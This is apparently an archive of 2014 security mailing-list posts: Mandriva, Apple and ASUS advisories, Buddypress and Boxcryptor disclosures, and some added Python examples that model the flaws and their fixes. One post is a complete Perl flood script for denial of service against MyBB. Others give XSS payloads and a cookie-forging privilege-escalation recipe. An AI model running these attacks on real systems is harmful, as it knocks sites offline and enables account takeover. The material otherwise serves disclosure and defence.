mes5/SRPMS/openldap-2.4.11-3.6mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 9ac984f57b49bcac9c244dcb2ea25f82  
mes5/x86_64/lib64ldap2.4_2-2.4.11-3.6mdvmes5.2.x86_64.rpm
 ad204d57a8e77c683b18fb57db9df223  
mes5/x86_64/lib64ldap2.4_2-devel-2.4.11-3.6mdvmes5.2.x86_64.rpm
 0101675decfd5db7f4bcdd2e205e5533  
mes5/x86_64/lib64ldap2.4_2-static-devel-2.4.11-3.6mdvmes5.2.x86_64.rpm
 924c8eb8dce5616f72cfd1c74ec3ffc0  
mes5/x86_64/openldap-2.4.11-3.6mdvmes5.2.x86_64.rpm
 b5483d5352e88095541aa4289c3f762b  
mes5/x86_64/openldap-clients-2.4.11-3.6mdvmes5.2.x86_64.rpm
 b2067967b6d3b3eb1a4536b76e8b2052  
mes5/x86_64/openldap-doc-2.4.11-3.6mdvmes5.2.x86_64.rpm
 6b328f09e078fbcdf8138f60eeb0c3c1  
mes5/x86_64/openldap-servers-2.4.11-3.6mdvmes5.2.x86_64.rpm
 9517f66ee97e0db3099135fff5c07a19  
mes5/x86_64/openldap-testprogs-2.4.11-3.6mdvmes5.2.x86_64.rpm
 70b08cd0c8d45322bba7bfbdba2cf202  
mes5/x86_64/openldap-tests-2.4.11-3.6mdvmes5.2.x86_64.rpm 
 8358868a61a01b5204d032d9674e5728  
mes5/SRPMS/openldap-2.4.11-3.6mdvmes5.2.src.rpm

 Mandriva Business Server 1/X86_64:
 1fbea4ddae49067310f9d52862186f12  
mbs1/x86_64/lib64ldap2.4_2-2.4.33-2.1.mbs1.x86_64.rpm
 3bed34f442d7d99ca6770a0aa334bf0e  
mbs1/x86_64/lib64ldap2.4_2-devel-2.4.33-2.1.mbs1.x86_64.rpm
 a10e56dc0d771e8da27059c0d84966fe  
mbs1/x86_64/lib64ldap2.4_2-static-devel-2.4.33-2.1.mbs1.x86_64.rpm
 df4a9a4436890707a76fe41c16999800  
mbs1/x86_64/openldap-2.4.33-2.1.mbs1.x86_64.rpm
 32fd4c412cf89d78e0887734bce10d36  
mbs1/x86_64/openldap-clients-2.4.33-2.1.mbs1.x86_64.rpm
 958f98530f1119e48d8f6f224d01ca6a  
mbs1/x86_64/openldap-doc-2.4.33-2.1.mbs1.x86_64.rpm
 b75dca39829dbca00adc0884e2ca6fbf  
mbs1/x86_64/openldap-servers-2.4.33-2.1.mbs1.x86_64.rpm
 8c4e2d2ef7e480d05ebcf9655adf2a94  
mbs1/x86_64/openldap-testprogs-2.4.33-2.1.mbs1.x86_64.rpm
 193e318abe419a0689144bf7af70ade6  
mbs1/x86_64/openldap-tests-2.4.33-2.1.mbs1.x86_64.rpm 
 4ebfb4dcbb423c34c48e03e61c96507a  mbs1/SRPMS/openldap-2.4.33-2.1.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)


Mybb All Version Denial of Service Vulnerability

2014-02-13 Thread iedb . team
###

# Mybb All Version Denial of Service Vulnerability

###

#!/usr/bin/perl
#
#
# @@@@@@@   @@@@@  @@@
# @@@@@@@@@  @@ @@@ @@@@@
# @@@@@@@@@@@   @@@   @@  @@@  @@@  @@@
# @@@@@@@@@  @@ @@@ @@@@@  @@@  @@@
# @@@@@@@@@   @ @@@@@  @@
# @@@@@@@@@ @@  @@@ @@@@@  @@
# @@@@@@@@@   @@@@@   @@   @@@@@@  @@@ @@@
# @@@@@@@@@ @@  @@@ @@ @@@@@@  @@@  @@@
# @@@@@@@   @@ @@@@@@  @@@   @@@
#
#
#
# Iranian Exploit DataBase
# Mybb All Version Denial of Service Vulnerability
# Test on Mybb 1.6.12
# Vendor site : www.mybb.com
# Code Written By Amir - iedb.t...@gmail.com - o0_shabgard...@yahoo.com
# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir
# Fb Page : https://www.facebook.com/iedb.ir
# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR  - F@riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker
# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini
# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
#
use Socket;
if (@ARGV < 2) { usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$data = "forums%5B%5D=all&version=rss2.0&limit=150&make=%D8%AF%D8%B1%DB%8C%D8%A7%D9%81%D8%AA+%D9%84%DB%8C%D9%86%DA%A9+%D9%BE%DB%8C%D9%88%D9%86%D8%AF+%D8%B3%D8%A7%DB%8C%D8%AA%DB%8C";
$len = length $data;
$foo = "POST ".$dir."misc.php?action=syndication HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
$data;
my $port = 80;
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,$foo, 0);
syswrite STDOUT, "+ ";
}
print "\n\n";
system("ping $host");
sub usage {
print "# \n";
print "##   Mybb All Version Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.t...@gmail.com - Id : o0_shabgard_0o \n";
print "##  Www.IeDb.Ir/acc   -   Www.IrIsT.Ir \n";
print "# \n";
print "## [host] [path] \n";
print "## http://host.com /mybb/\n";
print "# \n";
exit();
}
#
#  Archive Exploit = http://www.iedb.ir/exploits-1332.html
#

###

# Iranian Exploit DataBase = http://IeDb.Ir [2014-02-12]

###



APPLE-SA-2014-02-11-1 Boot Camp 5.1

2014-02-13 Thread Apple Product Security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

APPLE-SA-2014-02-11-1 Boot Camp 5.1

Boot Camp 5.1 is now available and addresses the following:

Boot Camp
Available for:  Macs running Boot Camp 5
Impact:  Loading a malformed executable file may cause memory
corruption in the kernel
Description:  A bounds checking issue existed in the AppleMNT.sys
driver's parsing of Portable Executable files. If a Portable
Executable file with a malformed header is loaded, this could cause a
Boot Camp driver to corrupt kernel memory. The issue was addressed
through improved bounds checking.
CVE-ID
CVE-2014-1253 : MJ0011 of 360 Security Center


Boot Camp 5.1 may be obtained via Apple Software Update or from:
http://support.apple.com/downloads/

Depending on your Mac model, the downloading file name is one of
the following two:

The download file name: BootCamp5.1.5621.zip
Its SHA-1 digest: 72c71be259474836c17ddd400aca2218660b8aac

The download file name: BootCamp5.1.5640.zip
Its SHA-1 digest: 2998a7881509a87b22abc6764379c0a33b6ced3a

Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org

iQIcBAEBAgAGBQJS+rIpAAoJEPefwLHPlZEwM0gQAJ5Ffh3VoQKk/psQJN6ABJar
SbijQfk9eILkiO/XDMwrLKmj0183VS1N+xGzLaZqC0wDjwwwUHOJHUGK02+rRPCf
pI2NkZeaRJtGeSfC1LjDHbBhToJLY3JbGU8+NiZrWiFwcJMhyHvgcjWQwOvN2X9R
jNiHvo5kTBXboaCwBU9NRvWXDmWbCeWPCsAr0WYOsyCMT4fms/2NtygjiregAGBO
BL1kDf2BiF+1lcfGD/cQgOyYPrvOhBtIp6//5UhksFY2h90lHu7Dm6FTUKlUyTzh
qKVSro4FL87OA2opuPwAOsbX/96XZEgHlHs2mOy2dGkDCZ2LF6KjWARanSIixBFV
2ARsj6ck+O9S+8KBVGEFBPPKN0fNZ7Irhivv/rR+w1AZLMsbLvdGdm4CarrMEogX
daPXwiWnMNsWadMVMIeHpjdYprVw/vfIDCqBXwZfLnDeHxtHgMxyNx0uuXrBPDWu
HjrB8Uo0/MSp55QyOSY4DLhQWVTC9mNc5CKcMmnmOQtH4niGyXc+D7k2pa7dKHPY
NLggsaiNOKiTjUpcgGEOz191Q7vVDGpGCuV81C9k+AYMWToXnffGXYO62zk0NeIH
7sZ9feNCTZHLlFDF0v9KnnyXFLMTcgT0WXtw1RAcBY7UebcaBSS1ljyw45qGo+bA
3J/op5VbemkYblZScFvu
=Dlmy
-END PGP SIGNATURE-



signature.asc
Description: Message signed with OpenPGP using GPGMail


ASUS RT Series Routers FTP Service - Default anonymous access

2014-02-13 Thread kyle Lovett
Five ASUS RT series routers suffer from a vendor vulnerability that
defaults the FTP service to anonymous access with full read/write permissions.
The service, which is activated from the administrative console, does
not give proper instructions or indications that the end user needs
to manually add a user to the FTP access table.

The vendor was first alerted to this issue in late June of 2012, and
then four other times officially from July 2012 to December 2012. It
was not until January of this year, when the editors for the Norwegian
publication IDG/PC World went to ASUS that any official response came.

This vulnerability has been exploited aggressively for some time now,
and according to a rolling count kept since July 2012,
over 30,000 unique IP addresses have, at one time or another, had their
FTP service shared.

The FTP service, when not secured, allows full read/write access
to any external storage devices attached to the USB ports on the
router.

The vendor has issued an official (beta) patch for the RT-AC68U as of
mid-January, and plans additional patches in the coming week.

Models Include:

RT-AC68U
RT-AC56U
RT-AC66U
RT-N66U
RT-N16

CWE-287: Improper Authentication
CVSS v2 Vector (AV:N/AC:L/Au:N/C:C/I:C/A:N/E:H/RL:OF/RC:C)

CVSS Base Score 9.4
Impact Subscore 9.2
Exploitability Subscore 10
CVSS Temporal Score 8.2
Overall CVSS Score 8.2

Many have reported malware being uploaded into the sync share folders,
large amounts of unauthorized file sharing and most importantly the
theft of entire hard drives of personal information. Over 7,300 units
are still vulnerable to this weakness as of today.

It is strongly urged that those with any of the above routers check to
ensure that their FTP service has been secured.

Links:
https://www.asus.com/Networking/RTAC68U/#support
http://www.idg.no/pcworld/article281004.ece
http://www.thinkbroadband.com/news/6229-new-asus-router-firmware-to-fix-ftp-security-issue.html
http://www.pcworld.com/article/2087180/asus-simplifies-router-configuration-to-protect-external-hard-drives.html

Research Contact - Kyle Lovett
Discovered - June, 2012


[ MDVSA-2014:027 ] php

2014-02-13 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2014:027
 http://www.mandriva.com/en/support/security/
 ___

 Package : php
 Date: February 12, 2014
 Affected: Business Server 1.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in php:
 
 * Fixed bug #66356 (Heap Overflow Vulnerability in imagecrop())
 (CVE-2013-7226).
 
 The updated php packages have been upgraded to the 5.5.9 version
 which is not vulnerable to this issue.
 
 Additionally, the PECL packages which require it have been rebuilt for
 php-5.5.9. The libmbfl packages have been synced with the changes as of
 php-5.5.9 and the onig packages have been upgraded to the 5.9.5 version.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7226
 http://www.php.net/ChangeLog-5.php#5.5.9
 
http://git.php.net/?p=php-src.git;a=commitdiff;h=8f4a5373bb71590352fd934028d6dde5bc18530b
 https://bugs.php.net/bug.php?id=66356
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 f68e9cde917fe443e9e441d0c9d66ce8  mbs1/x86_64/apache-mod_php-5.5.9-1.mbs1.x86_64.rpm
 7d10a339a073e79141312df4c9ca80aa  mbs1/x86_64/lib64mbfl1-1.2.0-1.1.mbs1.x86_64.rpm
 4dfdb36268a4643b62314bd3b75219b6  mbs1/x86_64/lib64mbfl-devel-1.2.0-1.1.mbs1.x86_64.rpm
 2cf508b8892b0a23d6fb981bcdddb41f  mbs1/x86_64/lib64onig2-5.9.5-1.mbs1.x86_64.rpm
 7b0dc040e7713261fb799dcb32e82c0e  mbs1/x86_64/lib64onig-devel-5.9.5-1.mbs1.x86_64.rpm
 70b8fd8096d66f171efb55ae05f456a3  mbs1/x86_64/lib64php5_common5-5.5.9-1.mbs1.x86_64.rpm
 0fd3276c68104c57d28a6e18fea826d0  mbs1/x86_64/php-apc-3.1.15-1.3.mbs1.x86_64.rpm
 7800323fc65b42caa674e7396af2a4e1  mbs1/x86_64/php-apc-admin-3.1.15-1.3.mbs1.x86_64.rpm
 5d70731fa91073490f37ca42398c608e  mbs1/x86_64/php-bcmath-5.5.9-1.mbs1.x86_64.rpm
 212fc2be9f276372bbfbc64f6439e2b2  mbs1/x86_64/php-bz2-5.5.9-1.mbs1.x86_64.rpm
 45686258cb550c4f88c396162e6780fd  mbs1/x86_64/php-calendar-5.5.9-1.mbs1.x86_64.rpm
 45b23276ead2e0c29eb3558e2255e993  mbs1/x86_64/php-cgi-5.5.9-1.mbs1.x86_64.rpm
 d3106420622d1e8acdb7e90862ece84e  mbs1/x86_64/php-cli-5.5.9-1.mbs1.x86_64.rpm
 3ad121278fd62309e6f74780006c43ae  mbs1/x86_64/php-ctype-5.5.9-1.mbs1.x86_64.rpm
 df2513d9d0b3419c627cc59454a8d7c3  mbs1/x86_64/php-curl-5.5.9-1.mbs1.x86_64.rpm
 551edd728468a317b708916cc966060f  mbs1/x86_64/php-dba-5.5.9-1.mbs1.x86_64.rpm
 f718f7207e681d82d63c2bd8cceaaa54  mbs1/x86_64/php-devel-5.5.9-1.mbs1.x86_64.rpm
 5bb0bc339d01f573d0d8a0de9d9234d4  mbs1/x86_64/php-doc-5.5.9-1.mbs1.noarch.rpm
 3db6e08c25717fed5c997c07883e88b0  mbs1/x86_64/php-dom-5.5.9-1.mbs1.x86_64.rpm
 4d9c5351d500add57174c5900a47a0c3  mbs1/x86_64/php-enchant-5.5.9-1.mbs1.x86_64.rpm
 46dbf9383d34d95af4792cfb82ac73d8  mbs1/x86_64/php-exif-5.5.9-1.mbs1.x86_64.rpm
 87cd6dc4cb42b8aef1d98cc65173ce4d  mbs1/x86_64/php-fileinfo-5.5.9-1.mbs1.x86_64.rpm
 b694bf03a1a46a981f27d73dcf547666  mbs1/x86_64/php-filter-5.5.9-1.mbs1.x86_64.rpm
 4b4e7ccf4c358ef349355a2ad6ce191a  mbs1/x86_64/php-fpm-5.5.9-1.mbs1.x86_64.rpm
 5af9b30649f5a66b7fa3f0219ed61e8e  mbs1/x86_64/php-ftp-5.5.9-1.mbs1.x86_64.rpm
 3a141efc96b7cf3a5f23b07be5299410  mbs1/x86_64/php-gd-5.5.9-1.mbs1.x86_64.rpm
 a679a6b91e879cea954e2da8a9aed576  mbs1/x86_64/php-gettext-5.5.9-1.mbs1.x86_64.rpm
 a43329af2e0c6a86eab88a4cf953b1c2  mbs1/x86_64/php-gmp-5.5.9-1.mbs1.x86_64.rpm
 1e7313076b1bbf6921da6e08880ee34f  mbs1/x86_64/php-hash-5.5.9-1.mbs1.x86_64.rpm
 88753c2cac7139338c48cc6b6255d189  mbs1/x86_64/php-iconv-5.5.9-1.mbs1.x86_64.rpm
 f9030b302aab1ccb4768504c976029ff  mbs1/x86_64/php-imap-5.5.9-1.mbs1.x86_64.rpm
 d1764ebab05662d9c4f70ab6a4c161e6  mbs1/x86_64/php-ini-5.5.9-1.mbs1.x86_64.rpm
 9096c1ac1cb73c52c041f0326089413f  mbs1/x86_64/php-intl-5.5.9-1.mbs1.x86_64.rpm
 145b4b3c23f91c6d649abe4ce37dbff3  mbs1/x86_64/php-json-5.5.9-1.mbs1.x86_64.rpm
 45d6f9b9c85e41cea60ace17da9a53b5  mbs1/x86_64/php-ldap-5.5.9-1.mbs1.x86_64.rpm
 e9eaacd6b95eff0c7d2a183c37e85b9d  mbs1/x86_64/php-mbstring-5.5.9-1.mbs1.x86_64.rpm
 960056fb90c4696618a2c7db08c49752  mbs1/x86_64/php-mcrypt-5.5.9-1.mbs1.x86_64.rpm
 1a849355c2c2356a29c35bf92c6c9e14  mbs1/x86_64/php-mssql-5.5.9-1.mbs1.x86_64.rpm
 6b8960494d45a16271862b3a04bbf7b0  mbs1/x86_64/php-mysql-5.5.9-1.mbs1.x86_64.rpm
 dd1a58aeeb51962139211ef4f7dc2b13  mbs1/x86_64/php-mysqli-5.5.9-1.mbs1.x86_64.rpm
 9b8f5797d7f1372c3a863bed7dfe18db  mbs1/x86_64/php-mysqlnd-5.5.9-1.mbs1.x86_64.rpm
 a2ea2e43581521ebb20cedd36c08b843  mbs1/x86_64/php-odbc-5.5.9-1.mbs1.x86_64.rpm
 b1f61e8f0a9d359cfebfaed8371e118b  mbs1/x86_64/php-opcache-5.5.9-1.mbs1.x86_64.rpm
 d798dc1028db4ec202ee62251ba2c03f  

Re: ASUS RT Series Routers FTP Service - Default anonymous access

2014-02-13 Thread kyle Lovett
Correction: I meant to say 2013, not 2012. I apologize for the error.

On Wed, Feb 12, 2014 at 4:29 PM, kyle Lovett krlov...@gmail.com wrote:
 Five ASUS RT series routers suffer from a vendor vulnerability that
 defaults the FTP service to anonymous access with full read/write permissions.
 The service, which is activated from the administrative console, does
 not give proper instructions or indications that the end user needs
 to manually add a user to the FTP access table.

 The vendor was first alerted to this issue in late June of 2012, and
 then four other times officially from July 2012 to December 2012. It
 was not until January of this year, when the editors for the Norwegian
 publication IDG/PC World went to ASUS that any official response came.

 This vulnerability has been exploited aggressively for some time now,
 and as a rolling count which has been kept ongoing since July 2012,
 over 30,000 unique IP addresses, at one time or another, have had their
 FTP service shared.

 The FTP service, when not secured, allows full read/write access
 to any external storage devices attached to the USB drives on the
 router.

 The vendor has issued an official (beta) patch for the RT-AC68U as of
 mid-January, and plans on additional patches in the coming week.

 Models Include:

 RT-AC68U
 RT-AC56U
 RT-AC66U
 RT-N66U
 RT-N16

 CWE-287: Improper Authentication
 CVSS v2 Vector (AV:N/AC:L/Au:N/C:C/I:C/A:N/E:H/RL:OF/RC:C)

 CVSS Base Score 9.4
 Impact Subscore 9.2
 Exploitability Subscore 10
 CVSS Temporal Score 8.2
 Overall CVSS Score 8.2

 Many have reported malware being uploaded into the sync share folders,
 large amounts of unauthorized file sharing and most importantly the
 theft of entire hard drives of personal information. Over 7,300 units
 are still vulnerable to this weakness as of today.

 It is strongly urged that those with any of the above routers check to
 ensure that their FTP service has been secured.

 Links:
 https://www.asus.com/Networking/RTAC68U/#support
 http://www.idg.no/pcworld/article281004.ece
 http://www.thinkbroadband.com/news/6229-new-asus-router-firmware-to-fix-ftp-security-issue.html
 http://www.pcworld.com/article/2087180/asus-simplifies-router-configuration-to-protect-external-hard-drives.html

 Research Contact - Kyle Lovett
 Discovered - June, 2012


Wordpress plugin Buddypress <= 1.9.1 stored xss vulnerability

2014-02-13 Thread Pietro Oliva
# Vulnerability: Wordpress plugin Buddypress <= 1.9.1 stored xss
# Date: 13/02/2014
# Author: Pietro Oliva
# Vendor Homepage: http://buddypress.org
# Software Link: http://downloads.wordpress.org/plugin/buddypress.1.9.1.zip
# Version: 1.9.1
# CVE : [CVE-2014-1888]
# Responsibly disclosed and patched in version 1.9.2

During the group creation process in Buddypress it's possible to
inject JavaScript code into the name field in the form at
http://example.com/groups/create/step/group-details/, for instance:
name onmouseover=alert('xss').

To test this vulnerability you have to reproduce the following steps:

1) create a group named as follows: name onmouseover=alert('xss')
2) visiting this URL: http://example.com/groups/create/step/group-details/
causes the alert to show on mouse over of the group name field


-Pietro Oliva-


Wordpress plugin Buddypress <= 1.9.1 privilege escalation vulnerability

2014-02-13 Thread Pietro Oliva
# Vulnerability: Wordpress plugin Buddypress <= 1.9.1 privilege escalation
# Date: 13/02/2014
# Author: Pietro Oliva
# Vendor Homepage: http://buddypress.org
# Software Link: http://downloads.wordpress.org/plugin/buddypress.1.9.1.zip
# Version: 1.9.1
# CVE : [CVE-2014-1889]
# Responsibly disclosed and patched in version 1.9.2

It's possible to perform a privilege escalation attack due to a lack
of permissions check in the group creation process. A malicious user
could exploit this vulnerability to take control of every group
(change name, description, avatar and settings).
To exploit this vulnerability you have to follow these steps:

1) Create a cookie named bp_new_group_id=id_of_victim_group
2) Visit the url http://example.com/groups/create/step/group-details/
3) Enjoy the power




-Pietro Oliva-
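The privilege escalation above comes down to a group id taken from a client-controlled cookie and used for a write without checking that the current user may edit that group. The following is an added stand-alone Python model of that step and of the missing check, not BuddyPress code: the group store, the field names, the creator-only rule and the return values are assumptions chosen to illustrate the pattern, and the sample groups are constructed.

```python
"""Model of a 'group details' step that takes the target group from the
bp_new_group_id cookie, and the authorization check it was missing.

Added example; stand-alone Python, not BuddyPress code. Data model,
field names and return values are assumptions for illustration.
"""
import copy

# Constructed sample data: group 1 belongs to user 10, group 2 to user 20.
SAMPLE_GROUPS = {
    1: {"creator_id": 10, "name": "Victim group", "description": "The real one"},
    2: {"creator_id": 20, "name": "Attacker group", "description": "In progress"},
}


def save_group_details_vulnerable(groups, session_user_id, cookies, form):
    """Trusts bp_new_group_id and edits whichever group it names."""
    gid = int(cookies["bp_new_group_id"])
    group = groups[gid]
    group["name"] = form["group-name"]
    group["description"] = form["group-desc"]
    return gid


def save_group_details_fixed(groups, session_user_id, cookies, form):
    """Same step, but the cookie may only select a group the session user
    is allowed to edit (here: its creator); anything else is rejected
    before any write happens."""
    try:
        gid = int(cookies.get("bp_new_group_id", ""))
    except ValueError:
        return None                      # malformed id: treat as no group
    group = groups.get(gid)
    if group is None or group["creator_id"] != session_user_id:
        return None                      # not yours: refuse, do not write
    group["name"] = form["group-name"]
    group["description"] = form["group-desc"]
    return gid


def attack(handler):
    """User 20 forges the cookie to point at user 10's group.
    Returns (handler result, final name of the victim group)."""
    groups = copy.deepcopy(SAMPLE_GROUPS)
    cookies = {"bp_new_group_id": "1"}          # victim's id, not attacker's
    form = {"group-name": "Pwned", "group-desc": "Taken over"}
    result = handler(groups, session_user_id=20, cookies=cookies, form=form)
    return result, groups[1]["name"]


def legitimate_edit(handler):
    """User 20 edits their own group 2; both handlers must allow this."""
    groups = copy.deepcopy(SAMPLE_GROUPS)
    cookies = {"bp_new_group_id": "2"}
    form = {"group-name": "Renamed", "group-desc": "Still mine"}
    result = handler(groups, session_user_id=20, cookies=cookies, form=form)
    return result, groups[2]["name"]


if __name__ == "__main__":
    print("vulnerable:", attack(save_group_details_vulnerable))   # (1, 'Pwned')
    print("fixed:     ", attack(save_group_details_fixed))        # (None, 'Victim group')
```

The point of the model is where the check sits: the cookie is parsed and looked up exactly as before, but ownership is verified against the server-side session before the first write, so a forged id buys the attacker nothing while the legitimate flow is unchanged.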


[ISecAuditors Security Advisories] - Reflected XSS vulnerability in Boxcryptor (www.boxcryptor.com)

2014-02-13 Thread ISecAuditors Security Advisories
=
INTERNET SECURITY AUDITORS ALERT 2014-001
- Original release date: February 4, 2014
- Last revised: February 4, 2014
- Discovered by: Vicente Aguilera Diaz
- Severity: 4.3/10 (CVSSv2 Base Score)
- CVE-ID: -
=

I. VULNERABILITY
-
Reflected XSS vulnerability in Boxcryptor (www.boxcryptor.com).


II. BACKGROUND
-
Boxcryptor is an easy-to-use encryption software optimized for the
cloud. It allows the secure use of cloud storage services without
sacrificing comfort.

Boxcryptor supports all major cloud storage providers (such as Dropbox,
Google Drive, Microsoft SkyDrive, SugarSync) and supports all the clouds
that use the WebDAV standard (such as Cubby, Strato HiDrive, and ownCloud).


III. DESCRIPTION
-
An XSS vulnerability has been detected in www.boxcryptor.com.

Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into otherwise benign and trusted web
sites. Cross-site scripting (XSS) attacks occur when an attacker uses a
web application to send malicious code, generally in the form of a
browser-side script, to a different end user. Flaws that allow these
attacks to succeed are quite widespread and occur anywhere a web
application uses input from a user in the output it generates without
validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting
user. The end user's browser has no way to know that the script should
not be trusted, and will execute the script. Because it thinks the
script came from a trusted source, the malicious script can access any
cookies, session tokens, or other sensitive information retained by your
browser and used with that site. These scripts can even rewrite the
content of the HTML page.


IV. PROOF OF CONCEPT
-
Next, we show a typical request to save changes in My Account option:

POST /app/user/modify/userID HTTP/1.1
Host: www.boxcryptor.com
...
firstname=firstname&lastname=lastname&username=email&_newsletter=

where:
- userID is a numeric user ID generated by boxcryptor
- firstname is the firstname specified by the user
- lastname is the lastname specified by the user
- email is the email address specified by the user

A malicious user can inject arbitrary HTML/script code in the email
parameter.
For example:

POST /app/user/modify/3805739018726483071 HTTP/1.1
Host: www.boxcryptor.com
...
firstname=John&lastname=Smith&username=johnsm...@gmail.com<H1><center>This+is+a+XSS+example</center></H1>&_newsletter=


V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted
user's browser. This can be leveraged to steal sensitive information
such as user credentials, personal data, etc.


VI. SYSTEMS AFFECTED
-
www.boxcryptor.com


VII. SOLUTION
-
-


VIII. REFERENCES
-
http://www.isecauditors.com
http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)


IX. CREDITS
-
This vulnerability has been discovered
by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).


X. REVISION HISTORY
-
February 4, 2014: Initial release


XI. DISCLOSURE TIMELINE
-
February 4, 2014: Discovered by Internet Security Auditors
February 6, 2014: Contact with the developer team
February 10, 2014: Confirmed by vendor
February 10, 2014: Vendor deployed a new version
February 13, 2014: Internet Security Auditors release the advisory


XII. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is with
no warranties or guarantees of fitness of use or otherwise. Internet
Security Auditors accepts no responsibility for any damage caused by the
use or misuse of this information.


XIII. ABOUT
-
Internet Security Auditors is a Spain-based leader in web application
testing, network security, penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance, ITC,
etc. We are a vendor-independent provider with deep expertise since
2001. Our efforts in R&D include vulnerability research, open security
project collaboration and whitepapers, presentations and security events
participation and promotion. For further information regarding our
security services, contact us.
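Both XSS advisories above (the Buddypress stored XSS in the group name field, and the Boxcryptor reflected XSS in the email parameter of the account page) are the same defect in two output contexts: user input written into an HTML attribute, and user input written into the page body. The following is an added example, not code from Buddypress or Boxcryptor, that renders a stand-in of each page by plain concatenation (the behaviour the advisories report) and with context-aware escaping, then parses the result the way a browser would to see whether injected markup survives. The markup, field names and the attribute-breaking double quote in the group-name payload are assumptions; the payloads are otherwise the ones the advisories show.

```python
"""Output encoding for the two injection points in the advisories above.

Added example, not code from Buddypress or Boxcryptor. Each stand-in page
is rendered vulnerably (string concatenation) and hardened (html.escape
for the right context); an HTML-parser based audit then reports whether
the payload produced live tags or event handlers. Markup, field names
and the attribute-breaking quote in GROUP_NAME_PAYLOAD are assumptions.
"""
import html
from html.parser import HTMLParser

# Buddypress-style payload: the group name is echoed into an <input> value
# attribute, so a closing quote plus an event handler is enough.
GROUP_NAME_PAYLOAD = 'name" onmouseover="alert(\'xss\')'

# Boxcryptor-style payload: the email is echoed into the page body, so raw
# tags are enough (decoded form of the advisory's URL-encoded value).
EMAIL_PAYLOAD = "john@example.com<H1><center>This is a XSS example</center></H1>"


def render_group_form_vulnerable(group_name):
    return '<input name="group-name" value="' + group_name + '">'


def render_group_form_fixed(group_name):
    # quote=True also encodes " and ', which an attribute value needs.
    return ('<input name="group-name" value="'
            + html.escape(group_name, quote=True) + '">')


def render_account_vulnerable(firstname, lastname, email):
    return "<p>" + firstname + " " + lastname + " / " + email + "</p>"


def render_account_fixed(firstname, lastname, email):
    # Body context: escaping < > & is what stops new elements from forming.
    return ("<p>" + html.escape(firstname) + " " + html.escape(lastname)
            + " / " + html.escape(email) + "</p>")


class MarkupAudit(HTMLParser):
    """Collects the tag names and on* attributes a browser would act on."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.event_handlers += [name for name, _ in attrs if name.startswith("on")]


def injected(rendered, expected_tags):
    """True if the rendered page contains any element beyond the template's
    own, or any event-handler attribute: i.e. the input became markup."""
    audit = MarkupAudit()
    audit.feed(rendered)
    audit.close()
    unexpected = [t for t in audit.tags if t not in expected_tags]
    return bool(unexpected or audit.event_handlers)


def demo():
    """Run both payloads through the vulnerable and hardened renderers."""
    return {
        "group form, vulnerable": injected(
            render_group_form_vulnerable(GROUP_NAME_PAYLOAD), {"input"}),
        "group form, fixed": injected(
            render_group_form_fixed(GROUP_NAME_PAYLOAD), {"input"}),
        "account page, vulnerable": injected(
            render_account_vulnerable("John", "Smith", EMAIL_PAYLOAD), {"p"}),
        "account page, fixed": injected(
            render_account_fixed("John", "Smith", EMAIL_PAYLOAD), {"p"}),
    }


if __name__ == "__main__":
    for case, hit in demo().items():
        print(f"{case:26s} injected markup: {hit}")
```

The audit is deliberately parser-based rather than a substring match: it is the browser's tokenizer, not the raw string, that decides whether `"` closes an attribute or `<H1>` opens an element, and `html.parser` follows the same lowercase-and-attribute rules closely enough to show the difference between the two renderings.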